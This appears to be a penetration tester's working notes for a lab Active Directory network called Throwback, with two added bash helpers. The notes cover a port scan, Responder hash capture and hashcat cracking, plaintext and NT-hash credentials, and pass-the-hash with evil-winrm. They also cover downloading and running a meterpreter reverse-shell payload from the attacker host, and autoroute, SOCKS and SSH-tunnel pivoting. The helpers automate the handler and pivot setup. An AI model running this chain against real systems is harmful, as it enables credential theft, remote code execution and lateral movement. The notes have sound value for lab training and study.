Throwback-Prod
22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5357/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Caught a NetNTLMv2 hash for the user PetersJ using Responder (hashcat mode 5600 is NetNTLMv2, not the NT hash) and cracked it with hashcat:
hashcat -m 5600 peters-hash /usr/share/wordlists/rockyou.txt -r OneRuleToRuleThemAll.rule --debug-mode=1 --debug-file=matched.rule
Password is Throwback317
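Added example (not from the original notes): a bash helper that pulls only well-formed NetNTLMv2 lines out of a Responder capture (Responder writes one file per client and protocol under its logs/ directory, and those files also pick up NetNTLMv1 captures and stray output that hashcat -m 5600 rejects), keeps one capture per account so hashcat does not spend time on duplicates, and shows the result on a constructed sample. The sample hashes are dummies, not real captured material, and the file names are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes: filter a Responder capture down to
# hashcat-ready NetNTLMv2 lines (-m 5600). The sample capture below is constructed.
set -euo pipefail

# NetNTLMv2 as hashcat expects it:
#   USER::DOMAIN:ServerChallenge(16 hex):NTProofStr(32 hex):blob(hex)
# Split on ':' that is 6 fields with an empty field 2. NetNTLMv1 (-m 5500) also has
# 6 fields but its field 4 is a 48-hex LM response, so the length checks reject it.
# One capture per USER@DOMAIN is enough for cracking, so later duplicates are dropped.
netntlmv2_lines() {
  awk -F: '
    NF == 6 && $2 == "" &&
    length($4) == 16 && $4 ~ /^[0-9A-Fa-f]+$/ &&
    length($5) == 32 && $5 ~ /^[0-9A-Fa-f]+$/ &&
    length($6) >= 32 && $6 ~ /^[0-9A-Fa-f]+$/ {
      key = tolower($1 "@" $3)
      if (!(key in seen)) { seen[key] = 1; print }
    }' "$1"
}

# Constructed sample capture (dummy hex, assumed file name via mktemp):
# two captures for PetersJ, one for BlaireJ, one NetNTLMv1-shaped line, one junk line.
SAMPLE_CAPTURE=$(mktemp)
cat > "$SAMPLE_CAPTURE" <<'EOF'
PetersJ::THROWBACK:1122334455667788:aabbccddeeff00112233445566778899:0101000000000000c0653150de09d2010000000000000000
PetersJ::THROWBACK:8877665544332211:99887766554433221100ffeeddccbbaa:0101000000000000c0653150de09d2010000000000000000
BlaireJ::THROWBACK:1122334455667788:aabbccddeeff00112233445566778899:0101000000000000c0653150de09d2010000000000000000
PetersJ::THROWBACK:aabbccddeeff00112233445566778899aabbccddeeff0011:aabbccddeeff00112233445566778899aabbccddeeff0011:1122334455667788
garbage line from responder output
EOF

# Usage: write the filtered set to a file and hand that to hashcat -m 5600.
netntlmv2_lines "$SAMPLE_CAPTURE" > /tmp/netntlmv2.hashes
cat /tmp/netntlmv2.hashes
echo "hashcat -m 5600 /tmp/netntlmv2.hashes /usr/share/wordlists/rockyou.txt -r OneRuleToRuleThemAll.rule"
```

Only the first PetersJ capture and the BlaireJ capture survive; the NetNTLMv1-shaped line and the junk line are dropped, which is what you want before a long rule-based run.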
Able to log in now over SSH (OpenSSH for Windows takes user@domain as the login name, hence the double @):
ssh PetersJ@throwback.local@10.200.70.219
Saved credentials
BlaireJ
7eQgx6YzxgG3vC45t5k9
Elevation
runas /savecred /user:admin-petersj /profile "cmd.exe"
(saved credentials for admin-petersj on the box, so runas does not prompt; check with cmdkey /list first)
then set up a meterpreter session as admin-petersj,
autoroute 10.200.70.0/24 through it
and start a SOCKS proxy (version 4a)
Now log into Throwback-WS01 as BlaireJ through the proxy:
proxychains ssh BlaireJ@Throwback.local@10.200.70.222
Then enter the password
7eQgx6YzxgG3vC45t5k9
Setting up the proxy
Pass-the-hash as admin-petersj (NT hash, no password needed):
evil-winrm -u admin-petersj -H 74fb0a2ee8a066b1e372475dcbc121c5 -i 10.200.70.219
Establish meterpreter. Serve the payload from Kali:
python3 -m http.server 444
Fetch it from the evil-winrm shell (this is PowerShell, so wget is Invoke-WebRequest: use -OutFile, since -o is ambiguous there):
wget http://10.50.71.63:444/rshell-4444.exe -OutFile shell.exe
Start the handler on Kali:
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 4444; run"
Run the payload on the target:
.\shell.exe
In the meterpreter session, route the internal subnet and start the SOCKS server (VERSION must match what proxychains.conf says; the module listens on 1080 by default):
run autoroute -s 10.200.70.0/24
bg
use auxiliary/server/socks_proxy
set VERSION 4a
run
Setting up the next hop
Pass-the-hash as MercerH through the first proxy:
proxychains evil-winrm -u MercerH -H 5edc955e8167199d1b7d0e656da0ceea -i 10.200.70.117
wget http://10.50.71.63:444/rshell-4445.exe -OutFile shell.exe
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 4445; run"
.\shell.exe
bg
use post/multi/manage/autoroute
set session 1
(use the id of the session that just called back; check with sessions -l)
run
use auxiliary/server/socks_proxy
run
Current objective: run mimikatz on Throwback-DC01 to get the MercerH password
- changed it to Throwback2020
Pivoting with SSH tunnel
(example: attacker = kali, pwned jumpbox = debian)
To set up a SOCKS proxy on the kali machine on port 8080 (no sudo needed for an unprivileged port, and sudo would make ssh use root's keys and known_hosts):
ssh -N -D localhost:8080 <user>@debian
Run stuff through the proxy. In proxychains.conf (ssh -D speaks SOCKS4 and SOCKS5, so either entry type works):
socks4 localhost 8080
proxychains <command>
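Added example (not from the original notes) covering both the Metasploit pivot above (handler, autoroute, socks_proxy) and this SSH tunnel: a bash helper that generates the two resource scripts for one hop, a proxychains.conf whose ProxyList entry matches the SOCKS version actually served, the ssh -D command with the flags that make a failed tunnel fail loudly, and a listener check that needs no nc. Output paths under /tmp, the session id, the SOCKS port and the jumpbox name are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes. Generates msf resource scripts and a
# matching proxychains.conf for a pivot, for either the socks_proxy module or ssh -D.
# Ports, paths and session id below are assumptions for the demo.
set -euo pipefail

# handler_rc LPORT [LHOST]: reverse_tcp handler as a background job, so the console
# stays free for the post modules once the session calls back.
handler_rc() {
  local lport=$1 lhost=${2:-tun0}
  cat <<EOF
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST ${lhost}
set LPORT ${lport}
set ExitOnSession false
run -j
EOF
}

# pivot_rc SESSION SUBNET NETMASK SOCKS_PORT VERSION: once the session is up, route
# SUBNET through it and start the SOCKS server. VERSION is 4a or 5, nothing else.
pivot_rc() {
  local session=$1 subnet=$2 netmask=$3 socks_port=$4 version=$5
  case "$version" in 4a|5) ;; *) echo "VERSION must be 4a or 5, got: $version" >&2; return 1 ;; esac
  cat <<EOF
use post/multi/manage/autoroute
set SESSION ${session}
set CMD add
set SUBNET ${subnet}
set NETMASK ${netmask}
run
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set SRVPORT ${socks_port}
set VERSION ${version}
run -j
EOF
}

# proxychains_type VERSION: socks_proxy's VERSION -> proxychains ProxyList keyword.
# A socks5 entry against a 4a server (or vice versa) just hangs, so derive one from the other.
proxychains_type() {
  case "$1" in
    4a) echo socks4 ;;
    5)  echo socks5 ;;
    *)  echo "unknown SOCKS version: $1" >&2; return 1 ;;
  esac
}

# proxychains_conf VERSION PORT: minimal config. proxy_dns keeps lookups for names
# like throwback.local from going to the local resolver.
proxychains_conf() {
  local type
  type=$(proxychains_type "$1")
  cat <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
${type} 127.0.0.1 $2
EOF
}

# ssh_socks_cmd USER HOST PORT: the ssh -D pivot. ExitOnForwardFailure makes a taken
# port an error instead of a silent no-op; keepalives stop an idle tunnel dying.
ssh_socks_cmd() {
  printf 'ssh -f -N -D 127.0.0.1:%s -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 %s@%s\n' "$3" "$1" "$2"
}

# socks_listening PORT: true once something accepts on 127.0.0.1:PORT (bash /dev/tcp).
# Run it after `run -j` or `ssh -f` and before the first proxychains command.
socks_listening() {
  (exec 3<>"/dev/tcp/127.0.0.1/$1") 2>/dev/null
}

# Demo with the values from the notes: second hop on 4445, SOCKS4a on 1080, ssh -D on 8080.
main() {
  handler_rc 4445 > /tmp/handler.rc
  pivot_rc 2 10.200.70.0 255.255.255.0 1080 4a > /tmp/pivot.rc
  proxychains_conf 4a 1080 > /tmp/proxychains.conf
  echo "msfconsole -q -r /tmp/handler.rc    # then: resource /tmp/pivot.rc once session 2 is up"
  echo "proxychains -f /tmp/proxychains.conf evil-winrm -u MercerH -H <hash> -i 10.200.70.117"
  ssh_socks_cmd user debian 8080
  socks_listening 1080 && echo "SOCKS up on 1080" || echo "nothing on 1080 yet"
}
main
```

The point of generating both files from one VERSION value is that the most common pivot failure in these notes' setup is not the exploit but a proxychains entry that does not match what the SOCKS server speaks, which shows up only as a hang.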